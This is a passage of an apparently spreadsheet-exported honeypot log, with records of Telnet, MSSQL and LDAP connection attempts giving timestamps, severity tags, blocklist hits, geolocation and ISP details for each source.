    <s v="23&amp;&amp;60469&amp;&amp;60928&amp;&amp;33786&amp;&amp;32923&amp;&amp;33608&amp;&amp;34981&amp;&amp;34298&amp;&amp;36359&amp;&amp;34978&amp;&amp;35670&amp;&amp;36355&amp;&amp;37738"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="TW"/>
    <s v="Taiwan"/>
    <s v="NA"/>
    <s v="Taiwan"/>
    <s v="Taipei City"/>
    <s v="Neihu District"/>
    <s v="1671467"/>
    <s v="NA"/>
    <s v="25.0689"/>
    <s v="121.591"/>
    <s v="3462"/>
    <s v="Chunghwa Telecom Co., Ltd."/>
    <s v="Chunghwa Telecom Co., Ltd."/>
    <s v="business"/>
    <s v="Chunghwa Telecom Co. Ltd."/>
    <s v="2011-01-20"/>
    <s v="HINET-NET"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login&amp;&amp;NA"/>
    <s v="{Data_TELNET:NA}&amp;&amp;NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:24ec:8445"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2123"/>
    <x v="2123"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-12T11:54:57"/>
    <d v="2025-04-12T11:53:05"/>
    <d v="2025-04-12T11:54:57"/>
    <n v="3"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_MSSQL_HC1"/>
    <s v="1433"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="MH"/>
    <s v="Maharashtra"/>
    <s v="Thane"/>
    <s v="Navi Mumbai (Reliance Corporate Park)"/>
    <s v="6619347"/>
    <s v="NA"/>
    <s v="19.136"/>
    <s v="73.0039"/>
    <s v="55836"/>
    <s v="Reliance Jio Infocomm Limited"/>
    <s v="Reliance Jio Infocomm Limited"/>
    <s v="cellular"/>
    <s v="JIO FTTX SUBSCRIBER"/>
    <s v="2010-10-27"/>
    <s v="RELIANCEJIO-IN"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3125:c0b9"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2124"/>
    <x v="2124"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-12T11:49:02"/>
    <d v="2025-04-12T11:49:02"/>
    <d v="2025-04-12T11:49:02"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="KL"/>
    <s v="Kerala"/>
    <s v="Thrissur"/>
    <s v="Kunnamkulam"/>
    <s v="1265579"/>
    <s v="NA"/>
    <s v="10.6467"/>
    <s v="76.0669"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="MTNL Pool Through BSNL"/>
    <s v="corporate"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:783d:2369"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2125"/>
    <x v="2125"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-12T11:23:29"/>
    <d v="2025-04-11T20:39:42"/>
    <d v="2025-04-12T11:23:29"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_HC1"/>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2007-08-01"/>
    <s v="BB-Multiplay"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75cf:a3fa"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2126"/>
    <x v="2126"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-12T10:56:18"/>
    <d v="2025-04-12T10:56:18"/>
    <d v="2025-04-12T10:56:18"/>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d9:e667"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2127"/>
    <x v="2127"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-12T10:55:07"/>
    <d v="2025-04-12T10:53:44"/>
    <d v="2025-04-12T10:55:07"/>
    <n v="3"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_MSSQL_HC1"/>
    <s v="1433"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IR"/>
    <s v="Iran"/>
    <s v="27"/>
    <s v="Golestan"/>
    <s v="NA"/>
    <s v="Gorgan"/>
    <s v="132892"/>
    <s v="NA"/>
    <s v="36.8445"/>
    <s v="54.4566"/>
    <s v="58224"/>
    <s v="Iran Telecommunication Company PJS"/>
    <s v="Iran Telecommunication Company PJS"/>
    <s v="business"/>
    <s v="NA"/>
    <s v="2012-08-29"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:5c8:e920"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2128"/>
    <x v="2128"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-12T10:40:15"/>
    <d v="2025-04-12T10:40:15"/>
    <d v="2025-04-12T10:40:15"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="DE"/>
    <s v="Germany"/>
    <s v="HE"/>
    <s v="Hesse"/>
    <s v="Regierungsbezirk Darmstadt"/>
    <s v="Frankfurt am Main"/>
    <s v="2925533"/>
    <s v="60313"/>
    <s v="50.1109"/>
    <s v="8.68213"/>
    <s v="3320"/>
    <s v="DTAG"/>
    <s v="Deutsche Telekom AG"/>
    <s v="consumer"/>
    <s v="Deutsche Telekom AG"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:d9ec:4608"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2129"/>
    <x v="2129"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-12T10:38:25"/>
    <d v="2025-04-12T10:38:25"/>
    <d v="2025-04-12T10:38:25"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="DL"/>
    <s v="Delhi"/>
    <s v="New Delhi"/>
    <s v="New Delhi (Connaught Lane)"/>
    <s v="1261481"/>
    <s v="110001"/>
    <s v="28.6306"/>
    <s v="77.2239"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="BSNL Internet"/>
    <s v="corporate"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75e8:6c8"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2130"/>
    <x v="2130"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-12T10:28:55"/>
    <d v="2025-04-12T10:20:10"/>
    <d v="2025-04-12T10:28:55"/>
    <n v="6"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="MH"/>
    <s v="Maharashtra"/>
    <s v="Mumbai Suburban"/>
    <s v="Mumbai"/>
    <s v="1275339"/>
    <s v="400001"/>
    <s v="19.076"/>
    <s v="72.8777"/>
    <s v="9829"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="MTNL Mumbai"/>
    <s v="business"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3bb6:d0a4"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2131"/>
    <x v="2131"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-12T10:20:19"/>
    <d v="2025-04-12T10:18:14"/>
    <d v="2025-04-12T10:20:19"/>
    <n v="3"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_MSSQL_HC1"/>
    <s v="1433"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="KA"/>
    <s v="Karnataka"/>
    <s v="Dakshin Kannad"/>
    <s v="Mangaluru"/>
    <s v="1263780"/>
    <s v="575001"/>
    <s v="12.9141"/>
    <s v="74.856"/>
    <s v="55836"/>
    <s v="Reliance Jio Infocomm Limited"/>
    <s v="Reliance Jio Infocomm Limited"/>
    <s v="cellular"/>
    <s v="RJIL South FTTX PUBLIC"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3125:f0b6"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2132"/>
    <x v="2132"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-12T10:14:26"/>
    <d v="2025-04-12T02:06:31"/>
    <d v="2025-04-12T10:14:26"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="TN"/>
    <s v="Tamil Nadu"/>
    <s v="Thanjavur"/>
    <s v="Peravurani"/>
    <s v="1259890"/>
    <s v="NA"/>
    <s v="10.2903"/>
    <s v="79.2016"/>
    <s v="9829"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="business"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7838:b0a0"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2133"/>
    <x v="2133"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-12T10:11:12"/>
    <d v="2025-04-11T19:17:39"/>
    <d v="2025-04-12T10:11:12"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_LDAP_HC1&amp;&amp;abuseipdb"/>
    <s v="389&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="high"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="US"/>
    <s v="United States"/>
    <s v="VA"/>
    <s v="Virginia"/>
    <s v="Rappahannock"/>
    <s v="Washington"/>
    <s v="4792307"/>
    <s v="22747"/>
    <s v="38.7134"/>
    <s v="-78.1591"/>
    <s v="8075"/>
    <s v="Microsoft Corporation"/>
    <s v="MICROSOFT"/>
    <s v="business"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="{Data_LDAP:NA}&amp;&amp;NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:87ed:7ee1"/>
    <s v="C-I"/>
    <s v="high"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2134"/>
    <x v="2134"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-12T10:10:33"/>
    <d v="2025-03-25T19:08:25"/>
    <d v="2025-04-12T10:10:33"/>
    <n v="73"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_H3&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="CA"/>
    <s v="Canada"/>
    <s v="ON"/>
    <s v="Ontario"/>
    <s v="Toronto"/>
    <s v="Toronto"/>
    <s v="6167865"/>
    <s v="M5A"/>
    <s v="43.6532"/>
    <s v="-79.3832"/>
    <s v="36445"/>
    <s v="Coextro"/>
    <s v="Coextro"/>
    <s v="business"/>
    <s v="Cogent communications - IPENG"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login&amp;&amp;NA"/>
    <s v="{Data_TELNET:NA}&amp;&amp;NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:2646:aa35"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2135"/>
    <x v="2135"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-12T10:10:16"/>
    <d v="2023-12-06T20:32:00"/>
    <d v="2025-04-12T10:10:16"/>
    <n v="205"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H6&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_MT-CPA_H37&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_MT-CPA_H7&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H33"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;45850&amp;&amp;2331&amp;&amp;NA&amp;&amp;9100"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="KR"/>
    <s v="South Korea"/>
    <s v="46"/>
    <s v="Jeollanam-do"/>
    <s v="Naju-si"/>
    <s v="Naju-si (Jinheung-gil)"/>
    <s v="1840535"/>
    <s v="NA"/>
    <s v="35.0185"/>
    <s v="126.795"/>
    <s v="4766"/>
    <s v="Korea Telecom"/>
    <s v="Korea Telecom"/>
    <s v="business"/>
    <s v="Kornet"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:d3fd:759c"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2136"/>
    <x v="2136"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-12T10:08:15"/>
    <d v="2025-04-11T16:11:45"/>
    <d v="2025-04-12T10:08:15"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H12"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'zen.spamhaus.org': ['unknown']}"/>
    <n v="33"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="HR"/>
    <s v="Haryana"/>
    <s v="Nuh"/>
    <s v="Chandīgarh"/>
    <s v="9915976"/>
    <s v="160017"/>
    <s v="30.7333"/>
    <s v="76.7794"/>
    <s v="9829"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="BSNL Internet"/>
    <s v="residential"/>
    <s v="NA"/>
    <s v="2007-08-01"/>
    <s v="BSNL-GSM-NorthZone"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75d2:c9c1"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2137"/>
    <x v="2137"/>
    <s v="p1252118-ipxg00a01kyoto.kyoto.ocn.ne.jp"/>
    <x v="0"/>
    <d v="2025-04-12T10:07:13"/>
    <d v="2025-04-12T10:07:13"/>
    <d v="2025-04-12T10:07:13"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'cbl.abuseat.org': ['unknown']}"/>
    <n v="32"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="JP"/>
    <s v="Japan"/>
    <s v="26"/>
    <s v="Kyoto"/>
    <s v="Kyōto"/>
    <s v="Kyoto"/>
    <s v="1857910"/>
    <s v="NA"/>
    <s v="35.0211"/>
    <s v="135.754"/>
    <s v="4713"/>
    <s v="OCN NTT Communications Corporation"/>
    <s v="NTT Communications Corporation"/>
    <s v="corporate"/>
    <s v="Open Computer Network"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="['ns1.ocn.ad.jp', 'ns2.ocn.ad.jp']"/>
    <s v="NA"/>
    <s v="Connected (2025/11/30)"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:9982:fe76"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2138"/>
    <x v="2138"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-12T10:03:04"/>
    <d v="2025-04-12T10:03:04"/>
    <d v="2025-04-12T10:03:04"/>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3b5c:c44b"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2139"/>
    <x v="2139"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-12T10:01:30"/>
    <d v="2025-04-12T10:01:30"/>
    <d v="2025-04-12T10:01:30"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="DL"/>
    <s v="Delhi"/>
    <s v="New Delhi"/>
    <s v="New Delhi (Block N)"/>
    <s v="1261481"/>
    <s v="110001"/>
    <s v="28.6309"/>
    <s v="77.2229"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="BSNL Internet"/>
    <s v="consumer"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75f2:eb3a"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2140"/>
    <x v="2140"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-12T09:52:52"/>
    <d v="2025-04-11T19:49:29"/>
    <d v="2025-04-12T09:52:52"/>
    <n v="3"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_HC1"/>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2007-08-01"/>
    <s v="BB-Multiplay-General"/>
    <s v="None"/>
